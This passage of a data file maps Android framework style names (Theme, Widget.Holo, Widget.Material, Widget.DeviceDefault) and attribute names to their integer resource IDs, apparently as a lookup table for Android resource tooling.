'Theme.Material.Light.NoActionBar.Fullscreen' : 16974402,
'Theme.Material.Light.NoActionBar.Overscan' : 16974403,
'Theme.Material.Light.NoActionBar.TranslucentDecor' : 16974404,
'Theme.Material.Light.Panel' : 16974405,
'Theme.Material.Light.Voice' : 16974406,
'Theme.Material.NoActionBar' : 16974382,
'Theme.Material.NoActionBar.Fullscreen' : 16974383,
'Theme.Material.NoActionBar.Overscan' : 16974384,
'Theme.Material.NoActionBar.TranslucentDecor' : 16974385,
'Theme.Material.Panel' : 16974386,
'Theme.Material.Settings' : 16974387,
'Theme.Material.Voice' : 16974388,
'Theme.Material.Wallpaper' : 16974389,
'Theme.Material.Wallpaper.NoTitleBar' : 16974390,
'Theme.NoDisplay' : 16973909,
'Theme.NoTitleBar' : 16973830,
'Theme.NoTitleBar.Fullscreen' : 16973831,
'Theme.NoTitleBar.OverlayActionModes' : 16973930,
'Theme.Panel' : 16973913,
'Theme.Translucent' : 16973839,
'Theme.Translucent.NoTitleBar' : 16973840,
'Theme.Translucent.NoTitleBar.Fullscreen' : 16973841,
'Theme.Wallpaper' : 16973918,
'Theme.WallpaperSettings' : 16973921,
'Theme.Wallpaper.NoTitleBar' : 16973919,
'Theme.Wallpaper.NoTitleBar.Fullscreen' : 16973920,
'Theme.WithActionBar' : 16973929,
'Widget' : 16973842,
'Widget.AbsListView' : 16973843,
'Widget.ActionBar' : 16973954,
'Widget.ActionBar.TabBar' : 16974068,
'Widget.ActionBar.TabText' : 16974067,
'Widget.ActionBar.TabView' : 16974066,
'Widget.ActionButton' : 16973956,
'Widget.ActionButton.CloseMode' : 16973960,
'Widget.ActionButton.Overflow' : 16973959,
'Widget.AutoCompleteTextView' : 16973863,
'Widget.Button' : 16973844,
'Widget.Button.Inset' : 16973845,
'Widget.Button.Small' : 16973846,
'Widget.Button.Toggle' : 16973847,
'Widget.CalendarView' : 16974059,
'Widget.CompoundButton' : 16973848,
'Widget.CompoundButton.CheckBox' : 16973849,
'Widget.CompoundButton.RadioButton' : 16973850,
'Widget.CompoundButton.Star' : 16973851,
'Widget.DatePicker' : 16974062,
'Widget.DeviceDefault' : 16974144,
'Widget.DeviceDefault.ActionBar' : 16974187,
'Widget.DeviceDefault.ActionBar.Solid' : 16974195,
'Widget.DeviceDefault.ActionBar.TabBar' : 16974194,
'Widget.DeviceDefault.ActionBar.TabText' : 16974193,
'Widget.DeviceDefault.ActionBar.TabView' : 16974192,
'Widget.DeviceDefault.ActionButton' : 16974182,
'Widget.DeviceDefault.ActionButton.CloseMode' : 16974186,
'Widget.DeviceDefault.ActionButton.Overflow' : 16974183,
'Widget.DeviceDefault.ActionButton.TextButton' : 16974184,
'Widget.DeviceDefault.ActionMode' : 16974185,
'Widget.DeviceDefault.AutoCompleteTextView' : 16974151,
'Widget.DeviceDefault.Button' : 16974145,
'Widget.DeviceDefault.Button.Borderless' : 16974188,
'Widget.DeviceDefault.Button.Borderless.Small' : 16974149,
'Widget.DeviceDefault.Button.Inset' : 16974147,
'Widget.DeviceDefault.Button.Small' : 16974146,
'Widget.DeviceDefault.Button.Toggle' : 16974148,
'Widget.DeviceDefault.CalendarView' : 16974190,
'Widget.DeviceDefault.CheckedTextView' : 16974299,
'Widget.DeviceDefault.CompoundButton.CheckBox' : 16974152,
'Widget.DeviceDefault.CompoundButton.RadioButton' : 16974169,
'Widget.DeviceDefault.CompoundButton.Star' : 16974173,
'Widget.DeviceDefault.DatePicker' : 16974191,
'Widget.DeviceDefault.DropDownItem' : 16974177,
'Widget.DeviceDefault.DropDownItem.Spinner' : 16974178,
'Widget.DeviceDefault.EditText' : 16974154,
'Widget.DeviceDefault.ExpandableListView' : 16974155,
'Widget.DeviceDefault.FastScroll' : 16974313,
'Widget.DeviceDefault.GridView' : 16974156,
'Widget.DeviceDefault.HorizontalScrollView' : 16974171,
'Widget.DeviceDefault.ImageButton' : 16974157,
'Widget.DeviceDefault.Light' : 16974196,
'Widget.DeviceDefault.Light.ActionBar' : 16974243,
'Widget.DeviceDefault.Light.ActionBar.Solid' : 16974247,
'Widget.DeviceDefault.Light.ActionBar.Solid.Inverse' : 16974248,
'Widget.DeviceDefault.Light.ActionBar.TabBar' : 16974246,
'Widget.DeviceDefault.Light.ActionBar.TabBar.Inverse' : 16974249,
'Widget.DeviceDefault.Light.ActionBar.TabText' : 16974245,
'Widget.DeviceDefault.Light.ActionBar.TabText.Inverse' : 16974251,
'Widget.DeviceDefault.Light.ActionBar.TabView' : 16974244,
'Widget.DeviceDefault.Light.ActionBar.TabView.Inverse' : 16974250,
'Widget.DeviceDefault.Light.ActionButton' : 16974239,
'Widget.DeviceDefault.Light.ActionButton.CloseMode' : 16974242,
'Widget.DeviceDefault.Light.ActionButton.Overflow' : 16974240,
'Widget.DeviceDefault.Light.ActionMode' : 16974241,
'Widget.DeviceDefault.Light.ActionMode.Inverse' : 16974252,
'Widget.DeviceDefault.Light.AutoCompleteTextView' : 16974203,
'Widget.DeviceDefault.Light.Button' : 16974197,
'Widget.DeviceDefault.Light.Button.Borderless.Small' : 16974201,
'Widget.DeviceDefault.Light.Button.Inset' : 16974199,
'Widget.DeviceDefault.Light.Button.Small' : 16974198,
'Widget.DeviceDefault.Light.Button.Toggle' : 16974200,
'Widget.DeviceDefault.Light.CalendarView' : 16974238,
'Widget.DeviceDefault.Light.CheckedTextView' : 16974300,
'Widget.DeviceDefault.Light.CompoundButton.CheckBox' : 16974204,
'Widget.DeviceDefault.Light.CompoundButton.RadioButton' : 16974224,
'Widget.DeviceDefault.Light.CompoundButton.Star' : 16974228,
'Widget.DeviceDefault.Light.DropDownItem' : 16974232,
'Widget.DeviceDefault.Light.DropDownItem.Spinner' : 16974233,
'Widget.DeviceDefault.Light.EditText' : 16974206,
'Widget.DeviceDefault.Light.ExpandableListView' : 16974207,
'Widget.DeviceDefault.Light.FastScroll' : 16974315,
'Widget.DeviceDefault.Light.GridView' : 16974208,
'Widget.DeviceDefault.Light.HorizontalScrollView' : 16974226,
'Widget.DeviceDefault.Light.ImageButton' : 16974209,
'Widget.DeviceDefault.Light.ListPopupWindow' : 16974235,
'Widget.DeviceDefault.Light.ListView' : 16974210,
'Widget.DeviceDefault.Light.ListView.DropDown' : 16974205,
'Widget.DeviceDefault.Light.MediaRouteButton' : 16974296,
'Widget.DeviceDefault.Light.PopupMenu' : 16974236,
'Widget.DeviceDefault.Light.PopupWindow' : 16974211,
'Widget.DeviceDefault.Light.ProgressBar' : 16974212,
'Widget.DeviceDefault.Light.ProgressBar.Horizontal' : 16974213,
'Widget.DeviceDefault.Light.ProgressBar.Inverse' : 16974217,
'Widget.DeviceDefault.Light.ProgressBar.Large' : 16974216,
'Widget.DeviceDefault.Light.ProgressBar.Large.Inverse' : 16974219,
'Widget.DeviceDefault.Light.ProgressBar.Small' : 16974214,
'Widget.DeviceDefault.Light.ProgressBar.Small.Inverse' : 16974218,
'Widget.DeviceDefault.Light.ProgressBar.Small.Title' : 16974215,
'Widget.DeviceDefault.Light.RatingBar' : 16974221,
'Widget.DeviceDefault.Light.RatingBar.Indicator' : 16974222,
'Widget.DeviceDefault.Light.RatingBar.Small' : 16974223,
'Widget.DeviceDefault.Light.ScrollView' : 16974225,
'Widget.DeviceDefault.Light.SeekBar' : 16974220,
'Widget.DeviceDefault.Light.Spinner' : 16974227,
'Widget.DeviceDefault.Light.StackView' : 16974316,
'Widget.DeviceDefault.Light.Tab' : 16974237,
'Widget.DeviceDefault.Light.TabWidget' : 16974229,
'Widget.DeviceDefault.Light.TextView' : 16974202,
'Widget.DeviceDefault.Light.TextView.SpinnerItem' : 16974234,
'Widget.DeviceDefault.Light.WebTextView' : 16974230,
'Widget.DeviceDefault.Light.WebView' : 16974231,
'Widget.DeviceDefault.ListPopupWindow' : 16974180,
'Widget.DeviceDefault.ListView' : 16974158,
'Widget.DeviceDefault.ListView.DropDown' : 16974153,
'Widget.DeviceDefault.MediaRouteButton' : 16974295,
'Widget.DeviceDefault.PopupMenu' : 16974181,
'Widget.DeviceDefault.PopupWindow' : 16974159,
'Widget.DeviceDefault.ProgressBar' : 16974160,
'Widget.DeviceDefault.ProgressBar.Horizontal' : 16974161,
'Widget.DeviceDefault.ProgressBar.Large' : 16974164,
'Widget.DeviceDefault.ProgressBar.Small' : 16974162,
'Widget.DeviceDefault.ProgressBar.Small.Title' : 16974163,
'Widget.DeviceDefault.RatingBar' : 16974166,
'Widget.DeviceDefault.RatingBar.Indicator' : 16974167,
'Widget.DeviceDefault.RatingBar.Small' : 16974168,
'Widget.DeviceDefault.ScrollView' : 16974170,
'Widget.DeviceDefault.SeekBar' : 16974165,
'Widget.DeviceDefault.Spinner' : 16974172,
'Widget.DeviceDefault.StackView' : 16974314,
'Widget.DeviceDefault.Tab' : 16974189,
'Widget.DeviceDefault.TabWidget' : 16974174,
'Widget.DeviceDefault.TextView' : 16974150,
'Widget.DeviceDefault.TextView.SpinnerItem' : 16974179,
'Widget.DeviceDefault.WebTextView' : 16974175,
'Widget.DeviceDefault.WebView' : 16974176,
'Widget.DropDownItem' : 16973867,
'Widget.DropDownItem.Spinner' : 16973868,
'Widget.EditText' : 16973859,
'Widget.ExpandableListView' : 16973860,
'Widget.FastScroll' : 16974309,
'Widget.FragmentBreadCrumbs' : 16973961,
'Widget.Gallery' : 16973877,
'Widget.GridView' : 16973874,
'Widget.Holo' : 16973962,
'Widget.Holo.ActionBar' : 16974004,
'Widget.Holo.ActionBar.Solid' : 16974113,
'Widget.Holo.ActionBar.TabBar' : 16974071,
'Widget.Holo.ActionBar.TabText' : 16974070,
'Widget.Holo.ActionBar.TabView' : 16974069,
'Widget.Holo.ActionButton' : 16973999,
'Widget.Holo.ActionButton.CloseMode' : 16974003,
'Widget.Holo.ActionButton.Overflow' : 16974000,
'Widget.Holo.ActionButton.TextButton' : 16974001,
'Widget.Holo.ActionMode' : 16974002,
'Widget.Holo.AutoCompleteTextView' : 16973968,
'Widget.Holo.Button' : 16973963,
'Widget.Holo.Button.Borderless' : 16974050,
'Widget.Holo.Button.Borderless.Small' : 16974106,
'Widget.Holo.Button.Inset' : 16973965,
'Widget.Holo.Button.Small' : 16973964,
'Widget.Holo.Button.Toggle' : 16973966,
'Widget.Holo.CalendarView' : 16974060,
'Widget.Holo.CheckedTextView' : 16974297,
'Widget.Holo.CompoundButton.CheckBox' : 16973969,
'Widget.Holo.CompoundButton.RadioButton' : 16973986,
'Widget.Holo.CompoundButton.Star' : 16973990,
'Widget.Holo.DatePicker' : 16974063,
'Widget.Holo.DropDownItem' : 16973994,
'Widget.Holo.DropDownItem.Spinner' : 16973995,
'Widget.Holo.EditText' : 16973971,
'Widget.Holo.ExpandableListView' : 16973972,
'Widget.Holo.GridView' : 16973973,
'Widget.Holo.HorizontalScrollView' : 16973988,
'Widget.Holo.ImageButton' : 16973974,
'Widget.Holo.Light' : 16974005,
'Widget.Holo.Light.ActionBar' : 16974049,
'Widget.Holo.Light.ActionBar.Solid' : 16974114,
'Widget.Holo.Light.ActionBar.Solid.Inverse' : 16974115,
'Widget.Holo.Light.ActionBar.TabBar' : 16974074,
'Widget.Holo.Light.ActionBar.TabBar.Inverse' : 16974116,
'Widget.Holo.Light.ActionBar.TabText' : 16974073,
'Widget.Holo.Light.ActionBar.TabText.Inverse' : 16974118,
'Widget.Holo.Light.ActionBar.TabView' : 16974072,
'Widget.Holo.Light.ActionBar.TabView.Inverse' : 16974117,
'Widget.Holo.Light.ActionButton' : 16974045,
'Widget.Holo.Light.ActionButton.CloseMode' : 16974048,
'Widget.Holo.Light.ActionButton.Overflow' : 16974046,
'Widget.Holo.Light.ActionMode' : 16974047,
'Widget.Holo.Light.ActionMode.Inverse' : 16974119,
'Widget.Holo.Light.AutoCompleteTextView' : 16974011,
'Widget.Holo.Light.Button' : 16974006,
'Widget.Holo.Light.Button.Borderless.Small' : 16974107,
'Widget.Holo.Light.Button.Inset' : 16974008,
'Widget.Holo.Light.Button.Small' : 16974007,
'Widget.Holo.Light.Button.Toggle' : 16974009,
'Widget.Holo.Light.CalendarView' : 16974061,
'Widget.Holo.Light.CheckedTextView' : 16974298,
'Widget.Holo.Light.CompoundButton.CheckBox' : 16974012,
'Widget.Holo.Light.CompoundButton.RadioButton' : 16974032,
'Widget.Holo.Light.CompoundButton.Star' : 16974036,
'Widget.Holo.Light.DropDownItem' : 16974040,
'Widget.Holo.Light.DropDownItem.Spinner' : 16974041,
'Widget.Holo.Light.EditText' : 16974014,
'Widget.Holo.Light.ExpandableListView' : 16974015,
'Widget.Holo.Light.GridView' : 16974016,
'Widget.Holo.Light.HorizontalScrollView' : 16974034,
'Widget.Holo.Light.ImageButton' : 16974017,
'Widget.Holo.Light.ListPopupWindow' : 16974043,
'Widget.Holo.Light.ListView' : 16974018,
'Widget.Holo.Light.ListView.DropDown' : 16974013,
'Widget.Holo.Light.MediaRouteButton' : 16974294,
'Widget.Holo.Light.PopupMenu' : 16974044,
'Widget.Holo.Light.PopupWindow' : 16974019,
'Widget.Holo.Light.ProgressBar' : 16974020,
'Widget.Holo.Light.ProgressBar.Horizontal' : 16974021,
'Widget.Holo.Light.ProgressBar.Inverse' : 16974025,
'Widget.Holo.Light.ProgressBar.Large' : 16974024,
'Widget.Holo.Light.ProgressBar.Large.Inverse' : 16974027,
'Widget.Holo.Light.ProgressBar.Small' : 16974022,
'Widget.Holo.Light.ProgressBar.Small.Inverse' : 16974026,
'Widget.Holo.Light.ProgressBar.Small.Title' : 16974023,
'Widget.Holo.Light.RatingBar' : 16974029,
'Widget.Holo.Light.RatingBar.Indicator' : 16974030,
'Widget.Holo.Light.RatingBar.Small' : 16974031,
'Widget.Holo.Light.ScrollView' : 16974033,
'Widget.Holo.Light.SeekBar' : 16974028,
'Widget.Holo.Light.Spinner' : 16974035,
'Widget.Holo.Light.Tab' : 16974052,
'Widget.Holo.Light.TabWidget' : 16974037,
'Widget.Holo.Light.TextView' : 16974010,
'Widget.Holo.Light.TextView.SpinnerItem' : 16974042,
'Widget.Holo.Light.WebTextView' : 16974038,
'Widget.Holo.Light.WebView' : 16974039,
'Widget.Holo.ListPopupWindow' : 16973997,
'Widget.Holo.ListView' : 16973975,
'Widget.Holo.ListView.DropDown' : 16973970,
'Widget.Holo.MediaRouteButton' : 16974293,
'Widget.Holo.PopupMenu' : 16973998,
'Widget.Holo.PopupWindow' : 16973976,
'Widget.Holo.ProgressBar' : 16973977,
'Widget.Holo.ProgressBar.Horizontal' : 16973978,
'Widget.Holo.ProgressBar.Large' : 16973981,
'Widget.Holo.ProgressBar.Small' : 16973979,
'Widget.Holo.ProgressBar.Small.Title' : 16973980,
'Widget.Holo.RatingBar' : 16973983,
'Widget.Holo.RatingBar.Indicator' : 16973984,
'Widget.Holo.RatingBar.Small' : 16973985,
'Widget.Holo.ScrollView' : 16973987,
'Widget.Holo.SeekBar' : 16973982,
'Widget.Holo.Spinner' : 16973989,
'Widget.Holo.Tab' : 16974051,
'Widget.Holo.TabWidget' : 16973991,
'Widget.Holo.TextView' : 16973967,
'Widget.Holo.TextView.SpinnerItem' : 16973996,
'Widget.Holo.WebTextView' : 16973992,
'Widget.Holo.WebView' : 16973993,
'Widget.ImageButton' : 16973862,
'Widget.ImageWell' : 16973861,
'Widget.KeyboardView' : 16973911,
'Widget.ListPopupWindow' : 16973957,
'Widget.ListView' : 16973870,
'Widget.ListView.DropDown' : 16973872,
'Widget.ListView.Menu' : 16973873,
'Widget.ListView.White' : 16973871,
'Widget.Material' : 16974413,
'Widget.Material.ActionBar' : 16974414,
'Widget.Material.ActionBar.Solid' : 16974415,
'Widget.Material.ActionBar.TabBar' : 16974416,
'Widget.Material.ActionBar.TabText' : 16974417,
'Widget.Material.ActionBar.TabView' : 16974418,
'Widget.Material.ActionButton' : 16974419,
'Widget.Material.ActionButton.CloseMode' : 16974420,
'Widget.Material.ActionButton.Overflow' : 16974421,
'Widget.Material.ActionMode' : 16974422,
'Widget.Material.AutoCompleteTextView' : 16974423,
'Widget.Material.Button' : 16974424,
'Widget.Material.ButtonBar' : 16974431,
'Widget.Material.ButtonBar.AlertDialog' : 16974432,
'Widget.Material.Button.Borderless' : 16974425,
'Widget.Material.Button.Borderless.Colored' : 16974426,
'Widget.Material.Button.Borderless.Small' : 16974427,
'Widget.Material.Button.Inset' : 16974428,
'Widget.Material.Button.Small' : 16974429,
'Widget.Material.Button.Toggle' : 16974430,
'Widget.Material.CalendarView' : 16974433,
'Widget.Material.CheckedTextView' : 16974434,
'Widget.Material.CompoundButton.CheckBox' : 16974435,
'Widget.Material.CompoundButton.RadioButton' : 16974436,
'Widget.Material.CompoundButton.Star' : 16974437,
'Widget.Material.DatePicker' : 16974438,
'Widget.Material.DropDownItem' : 16974439,
'Widget.Material.DropDownItem.Spinner' : 16974440,
'Widget.Material.EditText' : 16974441,
'Widget.Material.ExpandableListView' : 16974442,
'Widget.Material.FastScroll' : 16974443,
'Widget.Material.GridView' : 16974444,
'Widget.Material.HorizontalScrollView' : 16974445,
'Widget.Material.ImageButton' : 16974446,
'Widget.Material.Light' : 16974478,
'Widget.Material.Light.ActionBar' : 16974479,
'Widget.Material.Light.ActionBar.Solid' : 16974480,
'Widget.Material.Light.ActionBar.TabBar' : 16974481,
'Widget.Material.Light.ActionBar.TabText' : 16974482,
'Widget.Material.Light.ActionBar.TabView' : 16974483,
'Widget.Material.Light.ActionButton' : 16974484,
'Widget.Material.Light.ActionButton.CloseMode' : 16974485,
'Widget.Material.Light.ActionButton.Overflow' : 16974486,
'Widget.Material.Light.ActionMode' : 16974487,
'Widget.Material.Light.AutoCompleteTextView' : 16974488,
'Widget.Material.Light.Button' : 16974489,
'Widget.Material.Light.ButtonBar' : 16974496,
'Widget.Material.Light.ButtonBar.AlertDialog' : 16974497,
'Widget.Material.Light.Button.Borderless' : 16974490,
'Widget.Material.Light.Button.Borderless.Colored' : 16974491,
'Widget.Material.Light.Button.Borderless.Small' : 16974492,
'Widget.Material.Light.Button.Inset' : 16974493,
'Widget.Material.Light.Button.Small' : 16974494,
'Widget.Material.Light.Button.Toggle' : 16974495,
'Widget.Material.Light.CalendarView' : 16974498,
'Widget.Material.Light.CheckedTextView' : 16974499,
'Widget.Material.Light.CompoundButton.CheckBox' : 16974500,
'Widget.Material.Light.CompoundButton.RadioButton' : 16974501,
'Widget.Material.Light.CompoundButton.Star' : 16974502,
'Widget.Material.Light.DatePicker' : 16974503,
'Widget.Material.Light.DropDownItem' : 16974504,
'Widget.Material.Light.DropDownItem.Spinner' : 16974505,
'Widget.Material.Light.EditText' : 16974506,
'Widget.Material.Light.ExpandableListView' : 16974507,
'Widget.Material.Light.FastScroll' : 16974508,
'Widget.Material.Light.GridView' : 16974509,
'Widget.Material.Light.HorizontalScrollView' : 16974510,
'Widget.Material.Light.ImageButton' : 16974511,
'Widget.Material.Light.ListPopupWindow' : 16974512,
'Widget.Material.Light.ListView' : 16974513,
'Widget.Material.Light.ListView.DropDown' : 16974514,
'Widget.Material.Light.MediaRouteButton' : 16974515,
'Widget.Material.Light.PopupMenu' : 16974516,
'Widget.Material.Light.PopupMenu.Overflow' : 16974517,
'Widget.Material.Light.PopupWindow' : 16974518,
'Widget.Material.Light.ProgressBar' : 16974519,
'Widget.Material.Light.ProgressBar.Horizontal' : 16974520,
'Widget.Material.Light.ProgressBar.Inverse' : 16974521,
'Widget.Material.Light.ProgressBar.Large' : 16974522,
'Widget.Material.Light.ProgressBar.Large.Inverse' : 16974523,
'Widget.Material.Light.ProgressBar.Small' : 16974524,
'Widget.Material.Light.ProgressBar.Small.Inverse' : 16974525,
'Widget.Material.Light.ProgressBar.Small.Title' : 16974526,
'Widget.Material.Light.RatingBar' : 16974527,
'Widget.Material.Light.RatingBar.Indicator' : 16974528,
'Widget.Material.Light.RatingBar.Small' : 16974529,
'Widget.Material.Light.ScrollView' : 16974530,
'Widget.Material.Light.SearchView' : 16974531,
'Widget.Material.Light.SeekBar' : 16974532,
'Widget.Material.Light.SegmentedButton' : 16974533,
'Widget.Material.Light.Spinner' : 16974535,
'Widget.Material.Light.Spinner.Underlined' : 16974536,
'Widget.Material.Light.StackView' : 16974534,
'Widget.Material.Light.Tab' : 16974537,
'Widget.Material.Light.TabWidget' : 16974538,
'Widget.Material.Light.TextView' : 16974539,
'Widget.Material.Light.TextView.SpinnerItem' : 16974540,
'Widget.Material.Light.TimePicker' : 16974541,
'Widget.Material.Light.WebTextView' : 16974542,
'Widget.Material.Light.WebView' : 16974543,
'Widget.Material.ListPopupWindow' : 16974447,
'Widget.Material.ListView' : 16974448,
'Widget.Material.ListView.DropDown' : 16974449,
'Widget.Material.MediaRouteButton' : 16974450,
'Widget.Material.PopupMenu' : 16974451,
'Widget.Material.PopupMenu.Overflow' : 16974452,
'Widget.Material.PopupWindow' : 16974453,
'Widget.Material.ProgressBar' : 16974454,
'Widget.Material.ProgressBar.Horizontal' : 16974455,
'Widget.Material.ProgressBar.Large' : 16974456,
'Widget.Material.ProgressBar.Small' : 16974457,
'Widget.Material.ProgressBar.Small.Title' : 16974458,
'Widget.Material.RatingBar' : 16974459,
'Widget.Material.RatingBar.Indicator' : 16974460,
'Widget.Material.RatingBar.Small' : 16974461,
'Widget.Material.ScrollView' : 16974462,
'Widget.Material.SearchView' : 16974463,
'Widget.Material.SeekBar' : 16974464,
'Widget.Material.SegmentedButton' : 16974465,
'Widget.Material.Spinner' : 16974467,
'Widget.Material.Spinner.Underlined' : 16974468,
'Widget.Material.StackView' : 16974466,
'Widget.Material.Tab' : 16974469,
'Widget.Material.TabWidget' : 16974470,
'Widget.Material.TextView' : 16974471,
'Widget.Material.TextView.SpinnerItem' : 16974472,
'Widget.Material.TimePicker' : 16974473,
'Widget.Material.Toolbar' : 16974474,
'Widget.Material.Toolbar.Button.Navigation' : 16974475,
'Widget.Material.WebTextView' : 16974476,
'Widget.Material.WebView' : 16974477,
'Widget.PopupMenu' : 16973958,
'Widget.PopupWindow' : 16973878,
'Widget.ProgressBar' : 16973852,
'Widget.ProgressBar.Horizontal' : 16973855,
'Widget.ProgressBar.Inverse' : 16973915,
'Widget.ProgressBar.Large' : 16973853,
'Widget.ProgressBar.Large.Inverse' : 16973916,
'Widget.ProgressBar.Small' : 16973854,
'Widget.ProgressBar.Small.Inverse' : 16973917,
'Widget.RatingBar' : 16973857,
'Widget.ScrollView' : 16973869,
'Widget.SeekBar' : 16973856,
'Widget.Spinner' : 16973864,
'Widget.Spinner.DropDown' : 16973955,
'Widget.StackView' : 16974310,
'Widget.TabWidget' : 16973876,
'Widget.TextView' : 16973858,
'Widget.TextView.PopupMenu' : 16973865,
'Widget.TextView.SpinnerItem' : 16973866,
'Widget.Toolbar' : 16974311,
'Widget.Toolbar.Button.Navigation' : 16974312,
'Widget.WebView' : 16973875,
},
'attr': {
'theme' : 16842752,
'label' : 16842753,
'icon' : 16842754,
'name' : 16842755,
'manageSpaceActivity' : 16842756,
'allowClearUserData' : 16842757,
'permission' : 16842758,
'readPermission' : 16842759,
'writePermission' : 16842760,
'protectionLevel' : 16842761,
'permissionGroup' : 16842762,
'sharedUserId' : 16842763,
'hasCode' : 16842764,
'persistent' : 16842765,
'enabled' : 16842766,
'debuggable' : 16842767,
'exported' : 16842768,
'process' : 16842769,
'taskAffinity' : 16842770,
'multiprocess' : 16842771,
'finishOnTaskLaunch' : 16842772,
'clearTaskOnLaunch' : 16842773,
'stateNotNeeded' : 16842774,
'excludeFromRecents' : 16842775,
'authorities' : 16842776,
'syncable' : 16842777,
'initOrder' : 16842778,
'grantUriPermissions' : 16842779,
'priority' : 16842780,
'launchMode' : 16842781,
'screenOrientation' : 16842782,
'configChanges' : 16842783,
'description' : 16842784,
'targetPackage' : 16842785,
'handleProfiling' : 16842786,
'functionalTest' : 16842787,
'value' : 16842788,
'resource' : 16842789,
'mimeType' : 16842790,
'scheme' : 16842791,
'host' : 16842792,
'port' : 16842793,
'path' : 16842794,
'pathPrefix' : 16842795,
'pathPattern' : 16842796,
'action' : 16842797,
'data' : 16842798,
'targetClass' : 16842799,
'colorForeground' : 16842800,
'colorBackground' : 16842801,
'backgroundDimAmount' : 16842802,
'disabledAlpha' : 16842803,
'textAppearance' : 16842804,
'textAppearanceInverse' : 16842805,
'textColorPrimary' : 16842806,
'textColorPrimaryDisableOnly' : 16842807,
'textColorSecondary' : 16842808,
'textColorPrimaryInverse' : 16842809,
'textColorSecondaryInverse' : 16842810,
'textColorPrimaryNoDisable' : 16842811,
'textColorSecondaryNoDisable' : 16842812,
'textColorPrimaryInverseNoDisable' : 16842813,
'textColorSecondaryInverseNoDisable' : 16842814,
'textColorHintInverse' : 16842815,
'textAppearanceLarge' : 16842816,
'textAppearanceMedium' : 16842817,
'textAppearanceSmall' : 16842818,
'textAppearanceLargeInverse' : 16842819,
'textAppearanceMediumInverse' : 16842820,
'textAppearanceSmallInverse' : 16842821,
'textCheckMark' : 16842822,
'textCheckMarkInverse' : 16842823,
'buttonStyle' : 16842824,
'buttonStyleSmall' : 16842825,
'buttonStyleInset' : 16842826,
'buttonStyleToggle' : 16842827,
'galleryItemBackground' : 16842828,
'listPreferredItemHeight' : 16842829,
'expandableListPreferredItemPaddingLeft' : 16842830,
'expandableListPreferredChildPaddingLeft' : 16842831,
'expandableListPreferredItemIndicatorLeft' : 16842832,
'expandableListPreferredItemIndicatorRight' : 16842833,
'expandableListPreferredChildIndicatorLeft' : 16842834,
'expandableListPreferredChildIndicatorRight' : 16842835,
'windowBackground' : 16842836,
'windowFrame' : 16842837,
'windowNoTitle' : 16842838,
'windowIsFloating' : 16842839,
'windowIsTranslucent' : 16842840,
'windowContentOverlay' : 16842841,
'windowTitleSize' : 16842842,
'windowTitleStyle' : 16842843,
'windowTitleBackgroundStyle' : 16842844,
'alertDialogStyle' : 16842845,
'panelBackground' : 16842846,
'panelFullBackground' : 16842847,
'panelColorForeground' : 16842848,
'panelColorBackground' : 16842849,
'panelTextAppearance' : 16842850,
'scrollbarSize' : 16842851,
'scrollbarThumbHorizontal' : 16842852,
'scrollbarThumbVertical' : 16842853,
'scrollbarTrackHorizontal' : 16842854,
'scrollbarTrackVertical' : 16842855,
'scrollbarAlwaysDrawHorizontalTrack' : 16842856,
'scrollbarAlwaysDrawVerticalTrack' : 16842857,
'absListViewStyle' : 16842858,
'autoCompleteTextViewStyle' : 16842859,
'checkboxStyle' : 16842860,
'dropDownListViewStyle' : 16842861,
'editTextStyle' : 16842862,
'expandableListViewStyle' : 16842863,
'galleryStyle' : 16842864,
'gridViewStyle' : 16842865,
'imageButtonStyle' : 16842866,
'imageWellStyle' : 16842867,
'listViewStyle' : 16842868,
'listViewWhiteStyle' : 16842869,
'popupWindowStyle' : 16842870,
'progressBarStyle' : 16842871,
'progressBarStyleHorizontal' : 16842872,
'progressBarStyleSmall' : 16842873,
'progressBarStyleLarge' : 16842874,
'seekBarStyle' : 16842875,
'ratingBarStyle' : 16842876,
'ratingBarStyleSmall' : 16842877,
'radioButtonStyle' : 16842878,
'scrollbarStyle' : 16842879,
'scrollViewStyle' : 16842880,
'spinnerStyle' : 16842881,
'starStyle' : 16842882,
'tabWidgetStyle' : 16842883,
'textViewStyle' : 16842884,
'webViewStyle' : 16842885,
'dropDownItemStyle' : 16842886,
'spinnerDropDownItemStyle' : 16842887,
'dropDownHintAppearance' : 16842888,
'spinnerItemStyle' : 16842889,
'mapViewStyle' : 16842890,
'preferenceScreenStyle' : 16842891,
'preferenceCategoryStyle' : 16842892,
'preferenceInformationStyle' : 16842893,
'preferenceStyle' : 16842894,
'checkBoxPreferenceStyle' : 16842895,
'yesNoPreferenceStyle' : 16842896,
'dialogPreferenceStyle' : 16842897,
'editTextPreferenceStyle' : 16842898,
'ringtonePreferenceStyle' : 16842899,
'preferenceLayoutChild' : 16842900,
'textSize' : 16842901,
'typeface' : 16842902,
'textStyle' : 16842903,
'textColor' : 16842904,
'textColorHighlight' : 16842905,
'textColorHint' : 16842906,
'textColorLink' : 16842907,
'state_focused' : 16842908,
'state_window_focused' : 16842909,
'state_enabled' : 16842910,
'state_checkable' : 16842911,
'state_checked' : 16842912,
'state_selected' : 16842913,
'state_active' : 16842914,
'state_single' : 16842915,
'state_first' : 16842916,
'state_middle' : 16842917,
'state_last' : 16842918,
'state_pressed' : 16842919,
'state_expanded' : 16842920,
'state_empty' : 16842921,
'state_above_anchor' : 16842922,
'ellipsize' : 16842923,
'x' : 16842924,
'y' : 16842925,
'windowAnimationStyle' : 16842926,
'gravity' : 16842927,
'autoLink' : 16842928,
'linksClickable' : 16842929,
'entries' : 16842930,
'layout_gravity' : 16842931,
'windowEnterAnimation' : 16842932,
'windowExitAnimation' : 16842933,
'windowShowAnimation' : 16842934,
'windowHideAnimation' : 16842935,
'activityOpenEnterAnimation' : 16842936,
'activityOpenExitAnimation' : 16842937,
'activityCloseEnterAnimation' : 16842938,
'activityCloseExitAnimation' : 16842939,
'taskOpenEnterAnimation' : 16842940,
'taskOpenExitAnimation' : 16842941,
'taskCloseEnterAnimation' : 16842942,
'taskCloseExitAnimation' : 16842943,
'taskToFrontEnterAnimation' : 16842944,
'taskToFrontExitAnimation' : 16842945,
'taskToBackEnterAnimation' : 16842946,
'taskToBackExitAnimation' : 16842947,
'orientation' : 16842948,
'keycode' : 16842949,
'fullDark' : 16842950,
'topDark' : 16842951,
'centerDark' : 16842952,
'bottomDark' : 16842953,
'fullBright' : 16842954,
'topBright' : 16842955,
'centerBright' : 16842956,
'bottomBright' : 16842957,
'bottomMedium' : 16842958,
'centerMedium' : 16842959,
'id' : 16842960,
'tag' : 16842961,
'scrollX' : 16842962,
'scrollY' : 16842963,
'background' : 16842964,
'padding' : 16842965,
'paddingLeft' : 16842966,
'paddingTop' : 16842967,
